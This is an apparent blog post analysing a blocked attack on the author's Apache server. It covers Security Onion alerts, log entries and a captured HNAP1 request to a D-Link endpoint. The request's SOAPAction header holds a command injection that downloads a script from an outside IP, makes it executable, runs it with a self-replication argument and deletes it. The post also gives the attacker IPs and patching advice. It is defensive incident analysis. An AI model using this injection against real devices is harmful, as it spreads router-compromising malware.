by Fred Theilig – @[email protected]
Security Onion threw up three alerts this week:
WGET Command Specifying Output in HTTP Headers
Possible D-Link Router HNAP Protocol Security Bypass Attempt
D-Link Devices Home Network Administration Protocol Command Execution
It was no surprise that all three were against my Apache server. First, let’s check out the logs:
68.69.185.58 - - [14/Aug/2024:04:23:13 -0400] "GET / HTTP/1.1" 200 51012 "-" "-"
68.69.185.58 - - [14/Aug/2024:04:23:15 -0400] "POST /HNAP1/ HTTP/1.1" 404 27331 "-" "Mozila/5.0"
The first line is a simple GET, but the second one was interesting. The 404 indicates that no harm was done, but what is HNAP1? Rather than paraphrase, I will include what I found in the SANS Internet Storm Center’s diary archives:
HNAP (Home Network Administration Protocol) is a network device management protocol, useful for anyone, but I think meant primarily for ISPs to manage fleets of devices deployed as part of your internet subscription. It’s covered in US Patent 20070130286 (http://www.google.com/patents/US20070130286), and is nicely described in a Cisco doc found here http://www.cisco.com/web/partners/downloads/guest/hnap_protocol_whitepaper.pdf
The protocol was patented originally by Pure Networks, but the protocol is now owned by and the implementation has been carried forward by Cisco.
This is how Security Onion identified this as a home router attack. But while the Apache logs showed fairly little, Security Onion has much more information:
POST /HNAP1/ HTTP/1.1
Host: 68.9.162.73:8888
User-Agent: Mozila/5.0
Accept-Encoding: gzip, deflate
Accept: /
Connection: keep-alive
SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://194.59.31.145/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh"
Content-Length: 0
The interesting part is the SOAPAction line, and also SOAPAction? SOAP stands for Simple Object Access Protocol and you can read up on it here: https://www.w3.org/TR/2000/NOTE-SOAP-20000508/ Apparently it is used with HNAP1 to communicate directly with a network device. In this case, a D-LINK router.
Essentially the bash text downloads a file called wget.sh, makes it executable, runs it with the parameter selfrep.dlink, then deletes it. Pretty standard stuff. So, let’s grab a copy of this file:
$ wget http://194.59.31.145/wget.sh
--2024-08-14 12:53:56-- http://194.59.31.145/wget.sh
Connecting to 194.59.31.145:80… failed: Connection refused.
Ok, so much for that. Doubly safe, it would seem. All we can do now is investigate the IP addresses:
68.69.185.58 – Provider: DediOutlet, LLC, Location: USA
194.59.31.145 – Location: Paris, Île-de-France Paris, France (FR)
Both IPs are on DNS blacklists, so this may have been BOT action. A forgotten server on the internet wielding a neutered weapon. I don’t use D-LINK products (friends don’t let friends …) so there was no chance of exploit, but if you do, consider updating the firmware. In fact, do this regardless of your router manufacturer. And if it is past end of life, consider upgrading to a more reliable manufacturer. Also, patch everything, but that goes without saying.